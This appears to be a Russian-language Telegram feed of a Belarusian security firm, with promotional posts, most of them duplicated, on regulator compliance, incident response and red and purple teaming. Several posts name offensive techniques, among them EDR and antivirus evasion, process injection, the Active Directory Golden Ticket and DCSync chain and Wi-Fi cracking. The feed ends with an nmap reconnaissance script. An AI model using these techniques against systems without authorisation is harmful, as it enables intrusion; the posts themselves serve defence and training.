🚨 Вы — критически важный объект? Проверьте, пока не пришли регуляторы.
Если ваша IT-система «упадет», пострадает ли целый город? Остановятся ли платежи в стране? Если ответ «да» — поздравляем (или сочувствуем), вы — КВОИ (критически важный объект информатизации).
Многие компании даже не подозревают о своем статусе, продолжая защищаться как обычный интернет-магазин. А это — прямой путь к серьезным санкциям и реальным катастрофам. 😱
Мы разобрали самую сложную тему в белорусской нормативке по ИБ простым языком.
В статье-руководстве:
✅ Тест на КВОИ за 1 минуту: 4 простых вопроса, чтобы понять, относится ли ваша система к критическим (социальная, экономическая, экологическая или информационная значимость).
📋 Чем КВОИ отличается от обычной системы: Разбираем жесткие требования Приказа ОАЦ №151 (спойлер: просто назначить админа ответственным уже не выйдет).
🛠 Пошаговый план действий: Что делать, если вы обнаружили себя в списке КВОИ. От оценки рисков до создания своей службы ИБ — расписали процесс на 10-18 месяцев вперед.
Узнайте свой статус сейчас, чтобы потом это не стало неприятным сюрпризом при проверке.
👉 Полное руководство по КВОИ в Беларуси:
https://redsec.by/article/kvoi-chto-eto-kak-ponyat-chto-vy-v-spiske-i-chto-teper-delat-polnoe-rukovodstvo/
Если ваша IT-система «упадет», пострадает ли целый город? Остановятся ли платежи в стране? Если ответ «да» — поздравляем (или сочувствуем), вы — КВОИ (критически важный объект информатизации).
Многие компании даже не подозревают о своем статусе, продолжая защищаться как обычный интернет-магазин. А это — прямой путь к серьезным санкциям и реальным катастрофам. 😱
Мы разобрали самую сложную тему в белорусской нормативке по ИБ простым языком.
В статье-руководстве:
✅ Тест на КВОИ за 1 минуту: 4 простых вопроса, чтобы понять, относится ли ваша система к критическим (социальная, экономическая, экологическая или информационная значимость).
📋 Чем КВОИ отличается от обычной системы: Разбираем жесткие требования Приказа ОАЦ №151 (спойлер: просто назначить админа ответственным уже не выйдет).
🛠 Пошаговый план действий: Что делать, если вы обнаружили себя в списке КВОИ. От оценки рисков до создания своей службы ИБ — расписали процесс на 10-18 месяцев вперед.
Узнайте свой статус сейчас, чтобы потом это не стало неприятным сюрпризом при проверке.
👉 Полное руководство по КВОИ в Беларуси:
https://redsec.by/article/kvoi-chto-eto-kak-ponyat-chto-vy-v-spiske-i-chto-teper-delat-polnoe-rukovodstvo/
RedSec Daily
КВОИ: Что это, как понять, что вы — в списке, и что теперь делать. Полное руководство.
Что такое критически важные объекты информатизации (КВОИ) в Беларуси? Как понять, относится ли к ним ваша система, и какие дополнительные требования ОАЦ нужно выполнить.
🛡 Аттестация ОАЦ: Доказать, а не просто показать.
Ваша система ИБ готова к реальной атаке или только к проверке по бумагам? 🤔
Стандартный пентест находит уязвимости, но не отвечает на главный вопрос: что произойдет, когда шифровальщик уже внутри? Выстоите ли вы?
Мы подготовили ультимативный гайд по симуляции атаки программы-вымогателя — это не просто аудит, а полноценный стресс-тест для всей вашей компании. Это тот самый способ доказать регулятору реальную, а не формальную устойчивость.
🔥 Что вы узнаете из статьи:
Резервное копирование (п. 7.5-7.7 Приказа №66): ⏱️ Проверяем, как быстро вы сможете восстановиться из бэкапов в условиях, приближенных к боевым.
План реагирования: 🚨 Разбираем, сработает ли ваш план на самом деле, или он так и останется на бумаге.
Сегментация сети (п. 7.9): 🧱 Сможет ли ваша сеть сдержать «пожар» в одном сегменте, или он распространится повсюду?
Мониторинг и SIEM (п. 1.1-1.5): 👁 Увидят ли ваши «стражи» из SOC аномальную активность до того, как станет слишком поздно?
Одна Red Team активность вместо десятка разрозненных проверок. Узнайте, как превратить подготовку к аттестации в реальное усиление киберзащиты.
➡️ Читайте полную статью и будьте готовы по-настоящему:
https://redsec.by/article/simulyaciya-ataki-programmy-vymogatelya-kompleksnaya-proverka-gotovnosti-k-attestacii-oac/
Ваша система ИБ готова к реальной атаке или только к проверке по бумагам? 🤔
Стандартный пентест находит уязвимости, но не отвечает на главный вопрос: что произойдет, когда шифровальщик уже внутри? Выстоите ли вы?
Мы подготовили ультимативный гайд по симуляции атаки программы-вымогателя — это не просто аудит, а полноценный стресс-тест для всей вашей компании. Это тот самый способ доказать регулятору реальную, а не формальную устойчивость.
🔥 Что вы узнаете из статьи:
Резервное копирование (п. 7.5-7.7 Приказа №66): ⏱️ Проверяем, как быстро вы сможете восстановиться из бэкапов в условиях, приближенных к боевым.
План реагирования: 🚨 Разбираем, сработает ли ваш план на самом деле, или он так и останется на бумаге.
Сегментация сети (п. 7.9): 🧱 Сможет ли ваша сеть сдержать «пожар» в одном сегменте, или он распространится повсюду?
Мониторинг и SIEM (п. 1.1-1.5): 👁 Увидят ли ваши «стражи» из SOC аномальную активность до того, как станет слишком поздно?
Одна Red Team активность вместо десятка разрозненных проверок. Узнайте, как превратить подготовку к аттестации в реальное усиление киберзащиты.
➡️ Читайте полную статью и будьте готовы по-настоящему:
https://redsec.by/article/simulyaciya-ataki-programmy-vymogatelya-kompleksnaya-proverka-gotovnosti-k-attestacii-oac/
RedSec Daily
Симуляция атаки программы-вымогателя: Комплексная проверка готовности к аттестации ОАЦ
Узнайте, как симуляция атаки программы-вымогателя становится комплексным стресс-тестом для ИБ и эффективным способом доказать готовность к аттестации ОАЦ РБ
🔗 От отчета Burp Suite до успешного аудита ОАЦ.
Знакомая ситуация? Сканер нашел в вашем веб-приложении SQL-инъекцию, а вы не знаете, как объяснить аудитору ОАЦ, что это не просто «техническая ошибка», а прямое нарушение требований ТНПА? 🤯
Хватит говорить на разных языках! Мы создали практический фреймворк, который «переводит» каждую уязвимость из OWASP Top 10 на язык Приказа ОАЦ №66.
Эта статья — ваш мост между миром разработки и миром регуляторики.
Что внутри:
Готовые формулировки: 📝 Берем уязвимость (например, XSS или Broken Access Control) и показываем, как грамотно описать ее в отчете для аудитора.
Прямое соответствие: 🎯 Четко связываем каждую угрозу из OWASP с конкретными пунктами Приказа №66. Например:
SQL Injection 👉 нарушение п.7.2 (Контроль доступа) и п.7.9 (Целостность).
Отсутствие HTTPS 👉 прямое нарушение п.7.16 (Криптографическая защита).
Уязвимые компоненты 👉 невыполнение п.7.8 (Контроль защищенности).
Практические шаги: 🛠 От сканирования до подготовки доказательной базы, которую примет любой аудитор.
Превратите технический отчет в неоспоримый аргумент на аттестации.
➡️ Полный разбор и шпаргалка для ИБ-специалиста уже в статье:
https://redsec.by/article/bezopasnost-veb-prilozhenij-kak-svyazat-owasp-top-10-s-trebovaniyami-oac-po-zashite-informacii/
Знакомая ситуация? Сканер нашел в вашем веб-приложении SQL-инъекцию, а вы не знаете, как объяснить аудитору ОАЦ, что это не просто «техническая ошибка», а прямое нарушение требований ТНПА? 🤯
Хватит говорить на разных языках! Мы создали практический фреймворк, который «переводит» каждую уязвимость из OWASP Top 10 на язык Приказа ОАЦ №66.
Эта статья — ваш мост между миром разработки и миром регуляторики.
Что внутри:
Готовые формулировки: 📝 Берем уязвимость (например, XSS или Broken Access Control) и показываем, как грамотно описать ее в отчете для аудитора.
Прямое соответствие: 🎯 Четко связываем каждую угрозу из OWASP с конкретными пунктами Приказа №66. Например:
SQL Injection 👉 нарушение п.7.2 (Контроль доступа) и п.7.9 (Целостность).
Отсутствие HTTPS 👉 прямое нарушение п.7.16 (Криптографическая защита).
Уязвимые компоненты 👉 невыполнение п.7.8 (Контроль защищенности).
Практические шаги: 🛠 От сканирования до подготовки доказательной базы, которую примет любой аудитор.
Превратите технический отчет в неоспоримый аргумент на аттестации.
➡️ Полный разбор и шпаргалка для ИБ-специалиста уже в статье:
https://redsec.by/article/bezopasnost-veb-prilozhenij-kak-svyazat-owasp-top-10-s-trebovaniyami-oac-po-zashite-informacii/
RedSec Daily
Безопасность веб-приложений: Как связать OWASP Top 10 с требованиями ОАЦ по защите информации
Практический гайд по связи уязвимостей OWASP Top 10 с требованиями Приказа №66 ОАЦ РБ. Превратите отчет сканера в доказательную базу для аттестации
Аттестация ОАЦ: как доказать, что ваша защита действительно работает?
Многие белорусские компании сталкиваются с проблемой: средства защиты информации (СЗИ) закуплены, но как показать регулятору их реальную эффективность? Классические учения Red Team vs Blue Team часто превращаются в войну отчетов, а не в совместную работу.
Есть современный подход — Purple Teaming. 🟣 Это не новая команда, а философия совместной работы атакующих (Red Team) и защитников (Blue Team).
Как это работает? Red Team открыто имитирует реальные атаки (например, Kerberoasting), а Blue Team в реальном времени смотрит, что удалось обнаружить. Вместе они анализируют пробелы и тут же создают новые правила для SIEM, улучшают мониторинг и повторяют атаку, чтобы убедиться, что теперь угроза будет замечена.
Главные преимущества для прохождения аттестации и не только:
🎯 Получить объективные доказательства эффективности СЗИ для регулятора.
🛡 Создать кастомные правила для SIEM, которые действительно ловят актуальные угрозы.
📈 Прокачать навыки всей команды ИБ на реальных кейсах.
✅ Найти и закрыть критические уязвимости до того, как их найдут злоумышленники или проверяющие.
Purple Teaming — это переход от «бумажной» безопасности к реальной киберустойчивости. В нашей новой большой статье мы подробно разобрали методологию на практических примерах, рассказали, как это помогает при аттестации, и дали готовые сценарии.
Читайте подробнее в нашем блоге:
https://redsec.by/article/purple-teaming-v-belorusskih-realiyah-kak-sovmestnaya-rabota-red-team-i-blue-team-pomogaet-projti-attestaciyu-oac/
Многие белорусские компании сталкиваются с проблемой: средства защиты информации (СЗИ) закуплены, но как показать регулятору их реальную эффективность? Классические учения Red Team vs Blue Team часто превращаются в войну отчетов, а не в совместную работу.
Есть современный подход — Purple Teaming. 🟣 Это не новая команда, а философия совместной работы атакующих (Red Team) и защитников (Blue Team).
Как это работает? Red Team открыто имитирует реальные атаки (например, Kerberoasting), а Blue Team в реальном времени смотрит, что удалось обнаружить. Вместе они анализируют пробелы и тут же создают новые правила для SIEM, улучшают мониторинг и повторяют атаку, чтобы убедиться, что теперь угроза будет замечена.
Главные преимущества для прохождения аттестации и не только:
🎯 Получить объективные доказательства эффективности СЗИ для регулятора.
🛡 Создать кастомные правила для SIEM, которые действительно ловят актуальные угрозы.
📈 Прокачать навыки всей команды ИБ на реальных кейсах.
✅ Найти и закрыть критические уязвимости до того, как их найдут злоумышленники или проверяющие.
Purple Teaming — это переход от «бумажной» безопасности к реальной киберустойчивости. В нашей новой большой статье мы подробно разобрали методологию на практических примерах, рассказали, как это помогает при аттестации, и дали готовые сценарии.
Читайте подробнее в нашем блоге:
https://redsec.by/article/purple-teaming-v-belorusskih-realiyah-kak-sovmestnaya-rabota-red-team-i-blue-team-pomogaet-projti-attestaciyu-oac/
RedSec Daily
Purple Teaming в белорусских реалиях: как совместная работа Red Team и Blue Team помогает пройти аттестацию ОАЦ
Узнайте, как методология Purple Teaming, объединяющая Red Team и Blue Team, помогает белорусским организациям повысить киберустойчивость и успешно пройти аттестацию ОАЦ
🔗 Ваша безопасность так же крепка, как ваше самое слабое звено. А что, если это ваш подрядчик?
Можно вложить миллионы в собственную защиту, но атакующие все чаще бьют по вашим поставщикам. Вспомните SolarWinds или Target — многомиллионные ущербы из-за взлома третьих сторон.
Для белорусских компаний это не просто теория. При аттестации ОАЦ и согласно Закону "О защите персональных данных", ответственность за утечку у подрядчика несете именно вы. Не сможете доказать, что контролируете поставщиков — рискуете не пройти аттестацию.
Так как же защититься? Не просто верить на слово, а проверять.
В нашей новой большой статье мы пошагово разобрали весь процесс аудита цепочки поставок:
📄 Какие пункты по ИБ обязательно включить в договор.
📊 Как классифицировать подрядчиков по уровню риска (Tier 1, 2, 3).
🕵️♂️ И самое главное: как легально и технически грамотно провести пентест инфраструктуры вашего подрядчика, чтобы увидеть реальную картину их защищенности.
Это не просто статья, а практическое руководство для защиты вашего бизнеса и успешного прохождения аттестации.
🔗 Читайте, как обезопасить свою цепочку поставок: https://redsec.by/article/audit-cepochki-postavok-kak-pentest-podryadchika-pomogaet-vypolnit-trebovaniya-oac-i-zashitit-vash-biznes/
Можно вложить миллионы в собственную защиту, но атакующие все чаще бьют по вашим поставщикам. Вспомните SolarWinds или Target — многомиллионные ущербы из-за взлома третьих сторон.
Для белорусских компаний это не просто теория. При аттестации ОАЦ и согласно Закону "О защите персональных данных", ответственность за утечку у подрядчика несете именно вы. Не сможете доказать, что контролируете поставщиков — рискуете не пройти аттестацию.
Так как же защититься? Не просто верить на слово, а проверять.
В нашей новой большой статье мы пошагово разобрали весь процесс аудита цепочки поставок:
📄 Какие пункты по ИБ обязательно включить в договор.
📊 Как классифицировать подрядчиков по уровню риска (Tier 1, 2, 3).
🕵️♂️ И самое главное: как легально и технически грамотно провести пентест инфраструктуры вашего подрядчика, чтобы увидеть реальную картину их защищенности.
Это не просто статья, а практическое руководство для защиты вашего бизнеса и успешного прохождения аттестации.
🔗 Читайте, как обезопасить свою цепочку поставок: https://redsec.by/article/audit-cepochki-postavok-kak-pentest-podryadchika-pomogaet-vypolnit-trebovaniya-oac-i-zashitit-vash-biznes/
RedSec Daily
Аудит цепочки поставок: как пентест подрядчика помогает выполнить требования ОАЦ и защитить ваш бизнес
Узнайте, как аудит цепочки поставок и пентест подрядчиков помогают выполнить требования ОАЦ РБ, снизить риски утечек и защитить ваш бизнес от атак третьих сторон.
🛡 Думаете, сертифицированный ОАЦ антивирус — это 100% защита? Подумайте еще раз.
Современные атакующие давно не пишут простые вирусы. Они «живут за счет системы» (Living off the Land), используя легитимные инструменты вроде PowerShell, и применяют бесфайловые атаки, которые не оставляют следов на диске.
Классические антивирусы, работающие по сигнатурам, просто не видят таких угроз. Они ищут знакомые «фотографии» преступников, в то время как враг уже давно научился менять внешность.
💥 Как они это делают?
Шифрование полезной нагрузки
Бесфайловые атаки через PowerShell
Инъекции в память и Process Hollowing
Обход AMSI и других защитных механизмов
Именно поэтому на смену AV приходят EDR-решения. Они анализируют не файлы, а поведение, выявляя аномалии и всю цепочку атаки в реальном времени.
👨💻 В нашей новой большой статье мы наглядно (с кодом!) показали, почему EDR — это новая реальность, и как именно атакующие обходят традиционную защиту.
🔗 Читайте полный разбор: https://redsec.by/article/obhod-antivirusov-sertificirovannyh-oac-pochemu-edr-eto-novaya-realnost-kiberzashity/
Современные атакующие давно не пишут простые вирусы. Они «живут за счет системы» (Living off the Land), используя легитимные инструменты вроде PowerShell, и применяют бесфайловые атаки, которые не оставляют следов на диске.
Классические антивирусы, работающие по сигнатурам, просто не видят таких угроз. Они ищут знакомые «фотографии» преступников, в то время как враг уже давно научился менять внешность.
💥 Как они это делают?
Шифрование полезной нагрузки
Бесфайловые атаки через PowerShell
Инъекции в память и Process Hollowing
Обход AMSI и других защитных механизмов
Именно поэтому на смену AV приходят EDR-решения. Они анализируют не файлы, а поведение, выявляя аномалии и всю цепочку атаки в реальном времени.
👨💻 В нашей новой большой статье мы наглядно (с кодом!) показали, почему EDR — это новая реальность, и как именно атакующие обходят традиционную защиту.
🔗 Читайте полный разбор: https://redsec.by/article/obhod-antivirusov-sertificirovannyh-oac-pochemu-edr-eto-novaya-realnost-kiberzashity/
RedSec Daily
Обход антивирусов, сертифицированных ОАЦ: почему EDR — это новая реальность киберзащиты
Узнайте, как атакующие обходят сертифицированные ОАЦ антивирусы с помощью бесфайловых атак, шифрования и инъекций в память, и почему EDR-системы стали необходимостью.
🎭 Как выполнить свой код в чужом процессе так, чтобы EDR ничего не заметил?
Стандартные техники вроде CreateRemoteThread давно стали "красной тряпкой" для систем защиты. Продвинутые атакующие используют куда более изощренные методы, злоупотребляя легитимными и недокументированными механизмами Windows.
Они не создают шум, а встраиваются в естественные процессы ОС, становясь практически невидимыми.
В нашей новой статье мы погружаемся в мир по-настоящему скрытных инъекций:
🐦 Early Bird APC Injection: Выполнение кода до того, как EDR успеет инициализировать свои хуки.
👻 Phantom DLL Hollowing: Создание "фантомной" DLL в памяти, которая связана с чистым системным файлом на диске.
🎭 Process Doppelgänging: Запуск вредоносного процесса под видом абсолютно легитимного, обманывая EDR на уровне создания процесса.
🪟 PROPagate & AtomBombing: Использование механизмов GUI и Atom Tables для скрытой передачи кода.
Погружаемся в мир Native API, транзакций NTFS и асинхронных вызовов. Полный разбор с детальными примерами кода — в нашей новой статье.
🔗 Изучить стелс-техники: https://redsec.by/article/prodvinutye-tehniki-raboty-s-pamyatyu-glubokoe-pogruzhenie-v-inekcii-i-vypolnenie-koda/
Стандартные техники вроде CreateRemoteThread давно стали "красной тряпкой" для систем защиты. Продвинутые атакующие используют куда более изощренные методы, злоупотребляя легитимными и недокументированными механизмами Windows.
Они не создают шум, а встраиваются в естественные процессы ОС, становясь практически невидимыми.
В нашей новой статье мы погружаемся в мир по-настоящему скрытных инъекций:
🐦 Early Bird APC Injection: Выполнение кода до того, как EDR успеет инициализировать свои хуки.
👻 Phantom DLL Hollowing: Создание "фантомной" DLL в памяти, которая связана с чистым системным файлом на диске.
🎭 Process Doppelgänging: Запуск вредоносного процесса под видом абсолютно легитимного, обманывая EDR на уровне создания процесса.
🪟 PROPagate & AtomBombing: Использование механизмов GUI и Atom Tables для скрытой передачи кода.
Погружаемся в мир Native API, транзакций NTFS и асинхронных вызовов. Полный разбор с детальными примерами кода — в нашей новой статье.
🔗 Изучить стелс-техники: https://redsec.by/article/prodvinutye-tehniki-raboty-s-pamyatyu-glubokoe-pogruzhenie-v-inekcii-i-vypolnenie-koda/
RedSec Daily
Продвинутые техники работы с памятью: глубокое погружение в инъекции и выполнение кода
Глубокое погружение в APC-инъекции, Process Doppelgänging, Phantom DLL Hollowing и прямые системные вызовы (syscall) — техники, используемые для обхода EDR-систем
Представьте: злоумышленник получил доступ к учетной записи обычного пользователя. Казалось бы, игра окончена? Нет, это только начало. Для атакующего это — точка входа на пути к заветной цели: правам Domain Admin.
Но как именно происходит этот путь? И что самое главное — видит ли это ваш SOC-аналитик?
В нашей новой статье мы разложили по полочкам всю цепочку атаки на Active Directory, показав ее с двух сторон:
Что делает атакующий 🔴:
🗺 Разведка: Запускает BloodHound, чтобы построить карту домена и найти пути для атаки.
➡️ Перемещение: Использует Pass-the-Hash и Pass-the-Ticket с помощью Mimikatz, чтобы прыгать с машины на машину.
👑 Закрепление: Создает Golden Ticket, получая вечный доступ ко всей сети с помощью хеша KRBTGT, украденного через DCSync.
Что видит защитник 🔵:
Event ID 5145, 4662: Шквал событий от BloodHound.
Event ID 4624 (Тип 9) и Sysmon 10: Явные следы Pass-the-Hash и доступа к lsass.exe.
Event ID 4769 без 4768: Аномалии Kerberos, кричащие о Pass-the-Ticket или Golden Ticket.
Мы не просто описали техники, а показали конкретные команды, выводы консоли и, главное, готовые правила для SIEM, которые помогут обнаружить каждый шаг противника.
Это must-read для Red Team, Blue Team и всех, кто отвечает за безопасность AD.
🔗 Читайте полный разбор с командами и правилами детекции: https://redsec.by/article/post-ekspluataciya-v-active-directory-ot-zahvata-uchyotki-do-domain-admin-chto-uvidit-vash-soc/
Но как именно происходит этот путь? И что самое главное — видит ли это ваш SOC-аналитик?
В нашей новой статье мы разложили по полочкам всю цепочку атаки на Active Directory, показав ее с двух сторон:
Что делает атакующий 🔴:
🗺 Разведка: Запускает BloodHound, чтобы построить карту домена и найти пути для атаки.
➡️ Перемещение: Использует Pass-the-Hash и Pass-the-Ticket с помощью Mimikatz, чтобы прыгать с машины на машину.
👑 Закрепление: Создает Golden Ticket, получая вечный доступ ко всей сети с помощью хеша KRBTGT, украденного через DCSync.
Что видит защитник 🔵:
Event ID 5145, 4662: Шквал событий от BloodHound.
Event ID 4624 (Тип 9) и Sysmon 10: Явные следы Pass-the-Hash и доступа к lsass.exe.
Event ID 4769 без 4768: Аномалии Kerberos, кричащие о Pass-the-Ticket или Golden Ticket.
Мы не просто описали техники, а показали конкретные команды, выводы консоли и, главное, готовые правила для SIEM, которые помогут обнаружить каждый шаг противника.
Это must-read для Red Team, Blue Team и всех, кто отвечает за безопасность AD.
🔗 Читайте полный разбор с командами и правилами детекции: https://redsec.by/article/post-ekspluataciya-v-active-directory-ot-zahvata-uchyotki-do-domain-admin-chto-uvidit-vash-soc/
RedSec Daily
Пост-эксплуатация в Active Directory: от захвата учётки до Domain Admin. Что увидит ваш SOC
Разбор атаки на Active Directory: от user до Domain Admin. Узнайте, как SOC обнаруживает Pass-the-Hash, Golden Ticket и BloodHound по логам Windows и Sysmon.
🔒 Ваш Wi-Fi в безопасности? Не будьте так уверены.
Даже самый сложный пароль не гарантирует защиту от современных атак. В 2025 году злоумышленники используют продвинутые методы, чтобы проникнуть в домашние и корпоративные беспроводные сети.
Мы подготовили исчерпывающее руководство по аудиту безопасности Wi-Fi, где детально разобрали весь процесс — от взлома до защиты.
Что внутри статьи:
🛠 Подготовка: Выбор правильного адаптера и ПО (Kali Linux).
💥 Атаки на WPA2-Personal: Пошаговый взлом Handshake и хитрая PMKID-атака без клиентов.
🎭 Evil Twin: Как создают поддельные сети для кражи паролей через фишинговые порталы.
🏢 Корпоративные сети: Методы атак на WPA-Enterprise (PEAP-MSCHAPv2).
🚫 Уязвимость WPS: Почему эту функцию на роутере нужно отключить ПРЯМО СЕЙЧАС.
🛡 Защита: Конкретные шаги по настройке WPA3, PMF (802.11w) и WIDS/WIPS для полной безопасности.
Это не просто теория. Внутри вы найдете реальные команды, разбор инструментов (Aircrack-ng, Hashcat, Fluxion, EAPHammer) и практические советы.
➡️ Читайте полное руководство и проверьте свою сеть: https://redsec.by/article/audit-bezopasnosti-wi-fi-polnoe-rukovodstvo-po-vzlomu-i-zashite/
Даже самый сложный пароль не гарантирует защиту от современных атак. В 2025 году злоумышленники используют продвинутые методы, чтобы проникнуть в домашние и корпоративные беспроводные сети.
Мы подготовили исчерпывающее руководство по аудиту безопасности Wi-Fi, где детально разобрали весь процесс — от взлома до защиты.
Что внутри статьи:
🛠 Подготовка: Выбор правильного адаптера и ПО (Kali Linux).
💥 Атаки на WPA2-Personal: Пошаговый взлом Handshake и хитрая PMKID-атака без клиентов.
🎭 Evil Twin: Как создают поддельные сети для кражи паролей через фишинговые порталы.
🏢 Корпоративные сети: Методы атак на WPA-Enterprise (PEAP-MSCHAPv2).
🚫 Уязвимость WPS: Почему эту функцию на роутере нужно отключить ПРЯМО СЕЙЧАС.
🛡 Защита: Конкретные шаги по настройке WPA3, PMF (802.11w) и WIDS/WIPS для полной безопасности.
Это не просто теория. Внутри вы найдете реальные команды, разбор инструментов (Aircrack-ng, Hashcat, Fluxion, EAPHammer) и практические советы.
➡️ Читайте полное руководство и проверьте свою сеть: https://redsec.by/article/audit-bezopasnosti-wi-fi-polnoe-rukovodstvo-po-vzlomu-i-zashite/
RedSec Daily
Аудит безопасности Wi-Fi: Полное руководство по взлому и защите
Практическое руководство по аудиту безопасности Wi-Fi сетей. Изучите методы взлома WPA2-Personal, PMKID-атаки, Evil Twin, атаки на WPA-Enterprise и WPS.
Как «продать» бюджет на ИБ руководству? 💰
Знакомая ситуация: вы просите бюджет на SIEM и пентесты, а в ответ слышите «Зачем так дорого?» или «У нас же есть антивирус»? 🤔
Проблема в том, что вы говорите на языке технологий, а руководство понимает язык денег, рисков и законов. Хватит просить, пора — обосновывать!
Чтобы получить бюджет, стройте аргументацию на трёх китах:
⚖️ 1. Закон (Приказы ОАЦ)
Это ваш главный козырь. С 1 марта 2025 года приказ №259 ужесточил требования. Теперь ежегодный пентест (п. 7.17) и наличие SIEM-системы (п. 1.1-1.5) — это обязанность, а не пожелание. Невыполнение — риск отзыва аттестата и остановки бизнеса.
📊 2. Деньги (Бизнес-риски)
Переведите угрозы в конкретные цифры. Используйте простую формулу:
Ожидаемые потери = Вероятность инцидента × Стоимость ущерба
Рассчитайте, во сколько обойдется день простоя, утечка данных или атака шифровальщика. Цифры убедительнее слов.
📈 3. Выгода (ROI)
Покажите, что ИБ — это не расходы, а инвестиция. Сравните стоимость защиты с потенциальными потерями.
ROI = (Предотвращенные потери - Затраты на ИБ) / Затраты на ИБ
Каждый вложенный рубль экономит компании 2, 3, а то и 10 рублей.
❌ Неправильно: «Нам нужен пентест, чтобы найти уязвимости».
✅ Правильно: «Приказ ОАЦ №66 (п. 7.17) обязывает нас провести пентест стоимостью X BYN. Альтернатива — отзыв аттестата и остановка бизнеса с прямыми потерями в XXX тыс. BYN».
Хотите получить готовые шаблоны презентаций, детальные расчеты рисков и полный чек-лист для защиты бюджета?
https://redsec.by/article/kak-obosnovat-byudzhet-na-ib-pered-rukovodstvom-govorim-na-yazyke-prikazov-oac-i-biznes-riskov/
👉 Читайте полную статью на нашем сайте:
Знакомая ситуация: вы просите бюджет на SIEM и пентесты, а в ответ слышите «Зачем так дорого?» или «У нас же есть антивирус»? 🤔
Проблема в том, что вы говорите на языке технологий, а руководство понимает язык денег, рисков и законов. Хватит просить, пора — обосновывать!
Чтобы получить бюджет, стройте аргументацию на трёх китах:
⚖️ 1. Закон (Приказы ОАЦ)
Это ваш главный козырь. С 1 марта 2025 года приказ №259 ужесточил требования. Теперь ежегодный пентест (п. 7.17) и наличие SIEM-системы (п. 1.1-1.5) — это обязанность, а не пожелание. Невыполнение — риск отзыва аттестата и остановки бизнеса.
📊 2. Деньги (Бизнес-риски)
Переведите угрозы в конкретные цифры. Используйте простую формулу:
Ожидаемые потери = Вероятность инцидента × Стоимость ущерба
Рассчитайте, во сколько обойдется день простоя, утечка данных или атака шифровальщика. Цифры убедительнее слов.
📈 3. Выгода (ROI)
Покажите, что ИБ — это не расходы, а инвестиция. Сравните стоимость защиты с потенциальными потерями.
ROI = (Предотвращенные потери - Затраты на ИБ) / Затраты на ИБ
Каждый вложенный рубль экономит компании 2, 3, а то и 10 рублей.
❌ Неправильно: «Нам нужен пентест, чтобы найти уязвимости».
✅ Правильно: «Приказ ОАЦ №66 (п. 7.17) обязывает нас провести пентест стоимостью X BYN. Альтернатива — отзыв аттестата и остановка бизнеса с прямыми потерями в XXX тыс. BYN».
Хотите получить готовые шаблоны презентаций, детальные расчеты рисков и полный чек-лист для защиты бюджета?
https://redsec.by/article/kak-obosnovat-byudzhet-na-ib-pered-rukovodstvom-govorim-na-yazyke-prikazov-oac-i-biznes-riskov/
👉 Читайте полную статью на нашем сайте:
RedSec Daily
Как обосновать бюджет на ИБ перед руководством: говорим на языке приказов ОАЦ и бизнес-рисков
Как IT-руководителю в Беларуси обосновать бюджет на ИБ? Говорим с руководством на языке приказов ОАЦ, бизнес-рисков и ROI. Готовые шаблоны и расчеты.
План реагирования на инциденты для ОАЦ: как не провалить проверку 📋
Думаете, скачанный из интернета шаблон Плана реагирования на инциденты (ПРИ) прокатит на проверке ОАЦ? Это прямой путь к проблемам. ❌
Регулятор хочет видеть не просто документ, а живой и работающий процесс, адаптированный под вашу компанию.
Что должно быть в вашем плане, чтобы он выдержал любую проверку?
1️⃣ Четкая команда (CSIRT)
Это не только IT-шники! В команду должны входить юристы, коммуникационщики и представители инфраструктуры. У каждого — своя роль, прописанная в матрице RACI.
2️⃣ Пять обязательных фаз реагирования
Весь процесс должен быть разбит на понятные этапы:
🔍 Обнаружение и Анализ: Как быстро вы поняли, что вас атакуют?
🛡 Сдерживание: Как вы остановили распространение угрозы?
🧹 Искоренение: Как вы полностью удалили вредонос и закрыли уязвимость?
🔄 Восстановление: Как вы вернули системы в строй, убедившись в их чистоте?
🧠 Извлечение Уроков (Lessons Learned): Что вы сделали, чтобы это не повторилось? (Самый важный для ОАЦ этап!)
3️⃣ Регулярные киберучения
План на бумаге — ничто без практики. Докажите его работоспособность через учения:
• Табулярные (Tabletop): Обсуждение сценария за столом.
• Функциональные: Тест конкретного действия (например, восстановление из бэкапа).
• Полномасштабные: Реалистичная симуляция атаки.
Помните: для ОАЦ документирование учений и работа над ошибками важнее, чем сам факт наличия плана.
Готовитесь к проверке? В нашей новой статье — полный чек-лист для самопроверки, шаблоны коммуникаций и сценарии киберучений, которые помогут вам быть во всеоружии.
👉 Изучить детальное руководство:
https://redsec.by/article/razrabotka-plana-reagirovaniya-na-incidenty-dlya-proverki-oac-polnoe-rukovodstvo/
Думаете, скачанный из интернета шаблон Плана реагирования на инциденты (ПРИ) прокатит на проверке ОАЦ? Это прямой путь к проблемам. ❌
Регулятор хочет видеть не просто документ, а живой и работающий процесс, адаптированный под вашу компанию.
Что должно быть в вашем плане, чтобы он выдержал любую проверку?
1️⃣ Четкая команда (CSIRT)
Это не только IT-шники! В команду должны входить юристы, коммуникационщики и представители инфраструктуры. У каждого — своя роль, прописанная в матрице RACI.
2️⃣ Пять обязательных фаз реагирования
Весь процесс должен быть разбит на понятные этапы:
🔍 Обнаружение и Анализ: Как быстро вы поняли, что вас атакуют?
🛡 Сдерживание: Как вы остановили распространение угрозы?
🧹 Искоренение: Как вы полностью удалили вредонос и закрыли уязвимость?
🔄 Восстановление: Как вы вернули системы в строй, убедившись в их чистоте?
🧠 Извлечение Уроков (Lessons Learned): Что вы сделали, чтобы это не повторилось? (Самый важный для ОАЦ этап!)
3️⃣ Регулярные киберучения
План на бумаге — ничто без практики. Докажите его работоспособность через учения:
• Табулярные (Tabletop): Обсуждение сценария за столом.
• Функциональные: Тест конкретного действия (например, восстановление из бэкапа).
• Полномасштабные: Реалистичная симуляция атаки.
Помните: для ОАЦ документирование учений и работа над ошибками важнее, чем сам факт наличия плана.
Готовитесь к проверке? В нашей новой статье — полный чек-лист для самопроверки, шаблоны коммуникаций и сценарии киберучений, которые помогут вам быть во всеоружии.
👉 Изучить детальное руководство:
https://redsec.by/article/razrabotka-plana-reagirovaniya-na-incidenty-dlya-proverki-oac-polnoe-rukovodstvo/
RedSec Daily
Разработка плана реагирования на инциденты для проверки ОАЦ: полное руководство
Полное руководство по разработке Плана реагирования на инциденты для прохождения проверки ОАЦ. Структура, команда CSIRT, 5 фаз, киберучения и чек-листы.
Сканирование портов с помощью nmap. Улучшить сканирование можно с помощью данного скрипта:
#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция -A).
